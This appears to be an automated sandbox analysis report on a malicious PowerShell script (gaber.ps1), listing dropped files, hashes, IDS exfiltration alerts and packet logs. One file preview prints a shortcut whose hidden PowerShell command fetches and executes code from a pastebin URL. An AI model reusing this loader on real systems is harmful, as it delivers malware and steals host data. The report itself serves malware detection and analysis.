                                                                            Entropy (8bit):4.527272298423835
                                                                            Encrypted:false
                                                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                            Malicious:true
                                                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):11608
                                                                            Entropy (8bit):4.890472898059848
                                                                            Encrypted:false
                                                                            SSDEEP:192:x9smzdcU6Cj9dcU6C7Vsm5emdV9smbib4xYTVsm5emdqxoe5gpOWib47VFn3eGOq:XFfib4xYTfHib47VoGIpN6KQkj2gikjm
                                                                            MD5:41B6EF8F5BDCA3771F6F993AB58D876A
                                                                            SHA1:F34B45B49FAA56534920AA42790BFEC7A32D63CD
                                                                            SHA-256:C01C9014DAF042A0080FCABE404337D5EFF6305F0F8BF6E96CE96818A620B9E9
                                                                            SHA-512:26A40B64312CF7E13136BDACF069D0F53D88ACCC5B61839F92D80684E57C18B2EE0BB458BDABD289304B4CD04DC067D55B7FDB802D9D2BA8A46C3FFDCF66C137
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllul55bl/Z:NllU
                                                                            MD5:D3B86703AAED73DD3EC0A467E8E94A75
                                                                            SHA1:0F4F7B2D253B1E5317E0523C584323EFE648AFCC
                                                                            SHA-256:B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
                                                                            SHA-512:D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dqh5flr.ru4.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pd343gk.waa.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5u0kpvub.2yc.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeygg0du.ifh.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghtkdrdr.5jn.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbwqtcat.kw1.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mizxizde.0um.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbvwiyvv.opu.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbukekgh.1bi.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rd4hht2j.hrw.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6225
                                                                            Entropy (8bit):3.7353274171037167
                                                                            Encrypted:false
                                                                            SSDEEP:48:qn2XKSXCGU20lvukvhkvklCywjrlIMFjl6XSogZow2JoJaFIMFjlyXSogZow2Jo2:rXPXC/rgkvhkvCCtjpzFjvHpozFjzHp+
                                                                            MD5:95594D24064D665BDECD8593680E3569
                                                                            SHA1:744EA3BACD3B32C1B2EB8634A15C3F9F972F2F63
                                                                            SHA-256:149E9806C89B8D25F1333F8EE7AAEBD5E6668A0C3D0DE0713064963B72157FE2
                                                                            SHA-512:B26BD43B6D1A5F670A03B5B592A746B59EC3A636A01BAF1AF1284D465558E6E3763D86349B70E87340F6A93F3079852E28FBD3F056093E0AC9B1379A552EB4F0
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....*_...l. .....z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_............1h.........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=OY.n..........................3*N.A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......EW.=OY.n.........................._...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=OY.n..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=OY.n...........................J..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=OY.n....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=OY.n....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=OY.n....9...........

                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V8OF3555M7G32LLY81MM.temp

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6225
                                                                            Entropy (8bit):3.7353274171037167
                                                                            Encrypted:false
                                                                            SSDEEP:48:qn2XKSXCGU20lvukvhkvklCywjrlIMFjl6XSogZow2JoJaFIMFjlyXSogZow2Jo2:rXPXC/rgkvhkvCCtjpzFjvHpozFjzHp+
                                                                            MD5:95594D24064D665BDECD8593680E3569
                                                                            SHA1:744EA3BACD3B32C1B2EB8634A15C3F9F972F2F63
                                                                            SHA-256:149E9806C89B8D25F1333F8EE7AAEBD5E6668A0C3D0DE0713064963B72157FE2
                                                                            SHA-512:B26BD43B6D1A5F670A03B5B592A746B59EC3A636A01BAF1AF1284D465558E6E3763D86349B70E87340F6A93F3079852E28FBD3F056093E0AC9B1379A552EB4F0
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. .....*_...l. .....z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_............1h.........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=OY.n..........................3*N.A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......EW.=OY.n.........................._...R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=OY.n..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=OY.n...........................J..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=OY.n....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=OY.n....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=OY.n....9...........

                                                                            Static File Info

                                                                            General

                                                                            File type:ASCII text, with very long lines (4783)
                                                                            Entropy (8bit):4.587321284476876
                                                                            TrID:
                                                                              File name:gaber.ps1
                                                                              File size:7'508 bytes
                                                                              MD5:f177ca636ad5075efbe6887fd66cb3b2
                                                                              SHA1:5713e175914d3fed4ea6735bde9d11573174cf38
                                                                              SHA256:b7dc686342b33eb4004a97e560c60d1f924dd513773ef39cc26fc797e7caf22b
                                                                              SHA512:0caf580e0b7d8914d5b9c7ec1ae8bfaad922abb0739e8a7f1435eccd356d62cda9556f6244171aefaf718ebc5e065a2d045d84cbef19b2f8d59c037a1ea40e25
                                                                              SSDEEP:96:ZNMvCNMC8ZNMgJ++KpFsB1UEb3CBqZz+E6tNMK01G7Zlo8Yu2IG:/MvMMbMMwpFshbwqUdMa2P
                                                                              TLSH:13F1BD71435057F4E9C187C5D06D73AB22BAC6AB30A83D25DBE21E8B6D1AED770341B2
                                                                              File Content Preview:sleep 5.rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force.sleep 5...$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".if (-Not (Test-Path $googoogaagaa)) {.rm $env:tmp\onedrivefilesync.dll -force.New-ItemPropert

                                                                              File Icon

                                                                              Icon Hash:3270d6baae77db44

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-15T15:53:48.856929+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.749873162.159.137.232443TCP
                                                                              2024-10-15T15:54:01.793594+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.749947162.159.137.232443TCP
                                                                              2024-10-15T15:54:08.153894+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.749979162.159.137.232443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 15, 2024 15:53:44.468120098 CEST4985480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:44.472971916 CEST8049854104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:44.473041058 CEST4985480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:44.477516890 CEST4985480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:44.482788086 CEST8049854104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.084228992 CEST8049854104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.087059021 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.087101936 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.087182045 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.096081972 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.096101046 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.134875059 CEST4985480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.822088003 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.822165012 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.826226950 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.826240063 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.826596975 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.833681107 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.879409075 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.979562044 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.979665995 CEST44349860104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:45.983720064 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:45.995373964 CEST49860443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:46.020256042 CEST4986580192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.026624918 CEST8049865185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.027915955 CEST4986580192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.027915955 CEST4986580192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.032887936 CEST8049865185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.638725042 CEST8049865185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.641794920 CEST8049865185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.641923904 CEST4986580192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.644063950 CEST4986580192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.648981094 CEST8049865185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.663474083 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.663496017 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:46.663594007 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.663887978 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:46.663898945 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.542340994 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.542480946 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.544622898 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.544631958 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.544909000 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.546030998 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.587405920 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.789128065 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:47.789180040 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:47.789283991 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:47.792067051 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:47.792088985 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910676956 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910754919 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910790920 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910803080 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.910815954 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910849094 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.910861969 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.910868883 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.911200047 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.911206961 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.919583082 CEST44349867185.199.108.133192.168.2.7
                                                                              Oct 15, 2024 15:53:47.919634104 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:47.940856934 CEST49867443192.168.2.7185.199.108.133
                                                                              Oct 15, 2024 15:53:48.429209948 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.429286003 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:48.431524038 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:48.431535006 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.431946039 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.444534063 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:48.487411976 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.577088118 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.577440023 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:48.577457905 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.856960058 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.857084036 CEST44349873162.159.137.232192.168.2.7
                                                                              Oct 15, 2024 15:53:48.857136965 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:48.878273964 CEST49873443192.168.2.7162.159.137.232
                                                                              Oct 15, 2024 15:53:51.695265055 CEST4989480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:51.700336933 CEST8049894104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:51.700628042 CEST4989480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:51.701632023 CEST4989480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:51.706423998 CEST8049894104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:52.332614899 CEST8049894104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:52.355479002 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:52.355535984 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:52.355654955 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:52.399048090 CEST4989480192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:52.421875954 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:52.421905994 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.032299995 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.032387972 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:53.036113977 CEST49900443192.168.2.7104.20.4.235
                                                                              Oct 15, 2024 15:53:53.036129951 CEST44349900104.20.4.235192.168.2.7
                                                                              Oct 15, 2024 15:53:53.036469936 CEST44349900104.20.4.235192.168.2.7
